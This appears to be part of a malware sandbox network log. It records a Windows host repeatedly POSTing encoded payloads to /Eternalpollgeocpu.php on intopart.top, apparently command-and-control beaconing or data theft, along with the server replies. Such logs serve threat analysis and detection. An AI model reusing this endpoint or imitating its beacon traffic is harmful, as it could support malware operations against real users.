Apr 29, 2024 01:04:22.484780073 CEST	1076	OUT	Data Raw: 5d 59 5a 5e 55 56 5b 51 54 56 50 51 5a 56 51 5b 5b 52 5e 48 54 5e 50 49 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]YZ^UV[QTVPQZVQ[[R^HT^PI]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'[%8\ "1=5;&<W$='*:.T?[ 0,8/%7 >^' Z/!Z/
Apr 29, 2024 01:04:22.866976023 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PFOeXtArvFiKII2Kv1dA8jSHA1m9Ljs0y053aAoWpOmS3KaU7I1DvnpQsRXwJzhRrj1mEyEMS2IfENDoqkKgcRMvAa%2Fms4TqY95%2FwO%2FZtsrsnLbE%2BTK3Aof21pvm9gU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0e4385d633c-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:22.867007971 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	49875	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:23.097167969 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:23.206985950 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:23.207246065 CEST	1080	OUT	Data Raw: 58 5a 5f 5c 50 5d 5e 52 54 56 50 51 5a 57 51 53 5b 52 5e 48 54 53 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XZ_\P]^RTVPQZWQS[R^HTSPF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1$_!2&>/4Q0>.).4$,/[4.]3 Z/!Z/
Apr 29, 2024 01:04:23.504035950 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1E0m%2FJGIuLoTDa1cJiRWJb7ngssPHo6oi4pr53UV4vNSFbqGTS1prxV%2F5jAJYTbKjFrg3Q3Iw4%2BR%2FAz4e4JKuoMuxQgaVm24t9WBIGYYNz6oDa1K4It9IkpW%2FvIm7uM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0e8b8b01045-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:23.504057884 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	49876	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:23.739029884 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:23.849699974 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:23.849842072 CEST	1080	OUT	Data Raw: 5d 5a 5a 51 55 59 5b 55 54 56 50 51 5a 50 51 5b 5b 52 5e 40 54 59 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]ZZQUY[UTVPQZPQ[[R^@TYPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Y1[ \422>%,3&-(()2W).+P'3+/##\' Z/!Z/<
Apr 29, 2024 01:04:24.246730089 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EobBYQQfUqVbjCAFphwJtLW3z9PIghZSeJFtSCTxr6CBTEMVb%2FXpG87vSMWLimHt5yv1bfVTvLJVmL%2BkNbhQ7TIQlENIr7cgyMk9aZg4n8w421PM0H7GBPimCrcoDeM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0ecba0fe100-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:24.246757984 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	49877	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:24.488949060 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:24.599045992 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:24.599178076 CEST	1080	OUT	Data Raw: 58 5f 5f 5d 55 58 5e 55 54 56 50 51 5a 54 51 50 5b 5d 5e 40 54 5c 50 45 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X__]UX^UTVPQZTQP[]^@T\PE]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%[; T<X2>9Z,V3>;=T)='U -<=] "_$ Z/!Z/,
Apr 29, 2024 01:04:25.022265911 CEST	581	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utN93VNYKcIh4T2Vv%2Ber1%2BSm%2FKibr2y0kefnbVsoMUzM3lFoRgwRuoRlC6oDFOaw5SqXnc19Hvu0XQEJyYnLGaYN39jAmX7FwrCb8DGD5tEybOI0w5NyvErAUS8EBgc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0f16ced61ca-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:25.022283077 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	49878	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:25.254898071 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:25.365510941 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:25.365798950 CEST	1080	OUT	Data Raw: 58 5f 5a 5d 50 5e 5b 54 54 56 50 51 5a 55 51 5a 5b 5e 5e 49 54 53 50 40 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X_Z]P^[TTVPQZUQZ[^^ITSP@]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$2-/#T3$->; $$(9.(7333/! U"3* Z/!Z/(
Apr 29, 2024 01:04:25.749730110 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TGmWAWpjREK8bQqDvMF2girQfFAnYD8qnsYIPJ8%2F%2FDoKvRLwu1beDnkgvTK0lqRaZ0XBzXrhkE8exqbsELOESz0ZD47hkTVBlERNsJ1EfKMHmxoEoZ4ExTj4UNYb1Ks%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0f63e34e255-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:25.749744892 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	49879	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:25.987595081 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:26.098429918 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:26.098628044 CEST	1080	OUT	Data Raw: 58 59 5f 58 50 59 5b 50 54 56 50 51 5a 5f 51 51 5b 52 5e 49 54 5f 50 43 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XY_XPY[PTVPQZ_QQ[R^IT_PC]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%-' !8_%1];7$>#**&U(/V'#</Y9 "0 Z/!Z/
Apr 29, 2024 01:04:26.483575106 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=26icqKDfFOJ0UKNL9qTphcAFiSKw0Gd0n1oeiDv12LMBm1HSd0iwsZTr27bpVwKXofXBZlsBqzzEX2ab637vM45fy3mKuI5Zjsl96U9Gn745a64vr31GuGdo%2BtKZl%2F8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0facd7fe1b6-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:26.483591080 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	49880	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:26.719139099 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:26.829715014 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:26.829848051 CEST	1080	OUT	Data Raw: 5d 58 5a 5e 55 5f 5e 53 54 56 50 51 5a 5f 51 57 5b 5b 5e 43 54 5e 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]XZ^U_^STVPQZ_QW[[^CT^PD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1[37T<X%1,&<U3-8X*92+=33;%#3._3: Z/!Z/
Apr 29, 2024 01:04:27.226433992 CEST	578	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ZOOWqc0jJVwLdK3Xmzf3%2B3AmKokzeU23%2BEIbX9tadI9%2BjH9PXm3PkJvKi7rg22sLxbRlnYs2jdbYuGcGdaKf25OVaSlr4%2FSON1A%2FjdwmZN6NcY%2Bf7QIuyF70afmRQY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0ff59bc2318-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:04:27.226448059 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:27.226459026 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	49881	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:27.457149982 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:27.567728996 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:27.567858934 CEST	1080	OUT	Data Raw: 5d 58 5a 5f 55 59 5b 52 54 56 50 51 5a 51 51 51 5b 52 5e 49 54 52 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]XZ_UY[RTVPQZQQQ[R^ITRPH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%8]#(_&=>85+$-0[)*+=30,?. U)3: Z/!Z/
Apr 29, 2024 01:04:27.851625919 CEST	593	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wEStiBq6cn%2F7JuuoSRy0WpMkU5%2B0OxCDqWbQFhnploVxjcnvnK0cOD9KG7CrQb%2FTcYYqF8%2BzxQDlBJ%2Fjylt0JbYbi%2BiWY1yMRZpvxZe%2FQEAXNqhcxI%2Fwmp%2BB5GjjPjY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab103f8ad2a06-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:27.851639986 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	49882	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:27.457648039 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:04:27.568360090 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:27.568469048 CEST	1788	OUT	Data Raw: 58 5d 5a 50 55 5d 5e 54 54 56 50 51 5a 5f 51 53 5b 53 5e 40 54 59 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X]ZPU]^TTVPQZ_QS[S^@TYPG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Y1=!"$_2=_/3&.3>\-(-#V' 8-/&"0!3* Z/!Z/
Apr 29, 2024 01:04:27.958105087 CEST	728	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0niplNqAvgSYUqIdzIy0ocYmONcSS46juq%2FfHKRdwO9UUxVX6NpSUJQbsj1Yf9Q0iiUW71wkqUrvGDAD84JotLuMyu%2FfYsrXaQfd6sPMgTlh8vyWmGYFBMOx0YHmvdc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab103faa42910-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 5c 3f 3b 03 55 3d 0b 26 51 26 22 27 1b 26 2f 0a 44 3d 2c 3a 45 32 30 24 5c 2f 00 3d 0b 33 1d 24 5c 20 00 28 5e 25 0f 3c 0e 28 1e 20 59 02 1c 3a 19 26 29 00 13 25 2d 33 15 2b 0b 36 06 35 3d 24 58 3e 3b 3d 0b 24 2c 21 17 2b 0d 2a 11 2b 07 23 0e 2e 03 25 5b 25 24 2f 10 3c 25 2c 52 08 13 20 52 2b 33 3b 0d 22 06 28 0b 27 31 3e 59 31 25 2f 50 21 38 20 1c 3f 00 38 16 26 32 0b 01 27 32 08 13 39 0d 24 1d 20 02 39 13 30 07 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 \?;U=&Q&"'&/D=,:E20$\/=3$\ (^%<( Y:&)%-3+65=$X>;=$,!+*+#.%[%$/<%,R R+3;"('1>Y1%/P!8 ?8&2'29$ 90!\/ I4]S
Apr 29, 2024 01:04:27.958120108 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	49883	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:28.088915110 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:28.199137926 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:28.199506044 CEST	1080	OUT	Data Raw: 5d 59 5f 5c 50 5c 5b 55 54 56 50 51 5a 53 51 56 5b 5f 5e 46 54 5a 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]Y_\P\[UTVPQZSQV[_^FTZPF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&0722X9;%U$Z=&S+$8-<:#6' Z/!Z/0
Apr 29, 2024 01:04:28.588009119 CEST	572	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FVrq0OG7PyGpfMB1wKj0%2BxspEMXrKt2He8MYwurbj5pprHo5YXzwG6FGZlm4YJIJCWF2xOUNnVEDRp91gB2Sj%2FtPCLUbtGnIONKf8BQ4v0ct0Wwf6y8gw3CbF7Tif1I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab107ebb21105-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:04:28.588025093 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:28.588037968 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	49884	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:28.819525957 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:28.929471016 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:28.929687023 CEST	1080	OUT	Data Raw: 58 53 5a 58 55 5e 5b 54 54 56 50 51 5a 57 51 5b 5b 53 5e 45 54 5d 50 43 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XSZXU^[TTVPQZWQ[[S^ET]PC]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1!",%!,V$,_>?>#'//-# 5$ Z/!Z/
Apr 29, 2024 01:04:29.232671976 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkrOEWYW3ki1YK2GU69bl1jEVSBbiG%2FPMHq9RNq8pnn%2B%2BibN3lT%2BhPjr1Vb5TIeGgT4XTyyF3QmNquuQtK5rz1XTWjs91RoJSKN%2F48XMCeR8QhPMlHPXkhfP4kTsqZ4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab10c7eaf10be-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:29.232685089 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	49885	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:29.468441963 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:29.578988075 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:29.579108000 CEST	1080	OUT	Data Raw: 5d 58 5f 58 55 5b 5b 5e 54 56 50 51 5a 55 51 56 5b 5d 5e 41 54 59 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]X_XU[[^TVPQZUQV[]^ATYPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%- _!1 2-%(T&-Z=:V+-Q0/8?=Y %3 Z/!Z/(
